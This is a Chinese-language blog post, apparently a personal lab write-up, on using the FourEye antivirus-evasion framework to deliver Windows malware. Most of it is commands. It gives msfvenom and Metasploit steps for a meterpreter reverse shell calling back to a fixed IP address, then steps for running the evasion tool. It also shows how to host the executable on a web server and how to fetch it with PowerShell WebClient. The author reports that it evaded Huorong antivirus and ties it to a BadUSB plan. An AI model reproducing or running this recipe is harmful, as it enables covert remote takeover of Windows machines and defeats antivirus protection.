zoukankan      html  css  js  c++  java
  • FourEye免杀框架实操与上线(服务器到期解封)

    题记

           今天想起来公众号上更了一篇免杀的文章,今天正好想试试这个框架。有助于回头研究我的badusb上线cs的测试,因此有了这篇文章。

    Kali下木马生成与监听

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.234.72.5 LPORT=4444 -f raw -o shell.raw

    set payload windows/meterpreter/reverse_tcp

    set lhost 103.234.72.5

    set lport 4444

    exploit

    CS下木马生成与监听

    此框架支持x64与x86免杀

    Raw

    进入免杀框架

     首先安装mingw-w64:apt-get install mingw-w64

    python3 BypassFramework.py

    Exe

    Exe的火绒过不了,360能过。

    Exe拉胯啊,用不了。视频演示功能性工具可用。

    浏览器下载与cmd下载后运行并上线

    生成成功后就可以移到好地方运行了。

    这里测试一下在我的网站远程下载

    cp /root/shellcode.exe /var/www/html 移到kali网站的根目录下

    网页搜索下载,成功,又离我的badusb计划进了一步。

    运行后成功在我真实机器上线并且免杀火绒。

    Cmd下载

    在打开的poershell窗口中,依次输入如下命令:

    $client = new-object System.Net.WebClient (按回车)

    $client.DownloadFile(' http://103.234.72.5/shellcode.exe',' E:2.exe') (按回车)

    其中,在实际应用中:

    '#1'需要用网络文件位置替代;

    '#2'需要用保存到本地后的路径+文件名替代。

    比如,$client.DownloadFile('http://test.com/xxx.html','D:index.html')

    参考链接

    https://www.bilibili.com/video/BV1zy4y1S7ZM/

    https://www.bilibili.com/video/BV1Sh411Z7qc

    https://www.bilibili.com/video/BV1b54y1x7RT

    http://github.com/lengjibo/FourEye

  • 相关阅读:
    坑爹的A标签 href
    JS 遍历 json key ,获取设置可变的key
    js to json字符串
    js eval深入
    Js 省市联动
    JS with用法
    JS
    js 内置对象常用方法
    django-pure-pagination 分页插件
    OpenStack 网络服务 Neutron 私有网络构建(十九)
  • 原文地址:https://www.cnblogs.com/sunny11/p/14240151.html
Copyright © 2011-2022 走看看